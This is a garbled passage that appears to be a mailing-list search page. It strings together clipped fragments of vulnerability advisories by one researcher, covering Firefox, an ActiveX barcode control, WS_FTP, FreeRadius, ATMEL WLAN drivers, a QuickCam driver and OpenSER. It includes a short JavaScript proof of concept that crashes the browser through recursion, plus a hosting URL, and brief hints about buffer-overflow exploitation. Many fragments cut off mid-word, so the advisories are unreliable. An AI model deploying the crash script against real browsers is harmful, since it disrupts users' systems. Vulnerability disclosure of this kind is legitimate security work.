Eleytt Research
www.eleytt.com
Overview/Credit:
Michal Bucko
www.eleytt.com/michal.bucko
sapheal.hack.pl
Vulnerability Table
===
1. Firefox 2.0.0.4 Remote Denial of Service Vulnerability
2. Microsoft Register Server Remote Denial of Service
Taltech Tal Bar Code ActiveX Control Memory Corruption
Vulnerability(-ies)
Michal Bucko (sapheal)
hack.pl
I. BACKGROUND
The Bar Code ActiveX Control has all the features necessary to easily add
professional quality barcodes to any Windows application including Web
Hey,
It appears that WS_FTP Professional 2007 is also vulnerable as it takes
advantage of NetscapeFTPHandler as well.
Now I am thinking of
something else. Could we use a specially crafted FHF file to exploit the
vulnerability? I haven't checked that yet.
Michal Bucko (sapheal)
As for now I am not aware of any exploits for this issue or even proofs that it
is exploitable.
Kind regards,
Michal Bucko (sapheal)
ng.
Kind regards,
Michal Bucko (sapheal)
hack.pl
rsions
=
FreeRadius <=1.1.3
Kind regards,
Michal Bucko (sapheal)
hack.pl
There is no doubt that's recursion. I must say I know there's much more of such
vulnerabilities in FF. One of those is below (this is an access violation
vulnerability and has to deal with recursion, too).
function owned(){
window.print();
owned();
}
Kind regards,
Michal Bucko
PoC exploit:
function owned(){
setTimeout("owned()",1000);
owned();
}
It is available under the following address:
http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html
Kind regards,
Michal Bucko (sapheal)
HACK.PL
memory corruption conditions.
Affected Versions
=
ATMEL WLAN drivers 3.4.1.1
Kind regards,
Michał Bućko - sapheal
HACK.PL
lution
=
The sent command must be small enough to fit in the prepared
buffer to send.
Exploitation
Exploitation might be conducted by using an overflowed command
variable value.
Kind regards,
Michal Bucko - sapheal
Synopsis: QuickCam linux device driver arbitrary code execution
Product: QuickCam
Version: <=1.0.9
Issue/Details:
A critical security vulnerability has been found in QuickCam
initialization function (qcamvc_video_init) of the protytype:
static void qcamvc_video_init(struct qcam
Synopsis: SMS handling OpenSER remote code executing
Product: OpenSER
Version: <=1.1.0
Issue:
==
A critical security vulnerability has been found in OpenSER SMS
handling module. The vulnerable function should read the SMS
from the SIM-memory.
Details:
int fetchsms(struct m
ted Versions
=
OpenSER <= 1.1.0
Solution
=
Proper boundary checking.
Exploitation
Exploitation might be conducted by preparing a specially crafted
OSP header.
Kind regards,
Michał Bućko - sapheal
Senior Security Specialist
HACK.PL
Function of a prototype:
static int parse_expression(char *str, expression **e, expression
**e_exceptions)
in OpenSER 1.1.0 (SIP router implementation) is vulnerable to buffer overflow
as /str/ might be longer than the destination (where it is coppied to).
15 matches
Mail list logo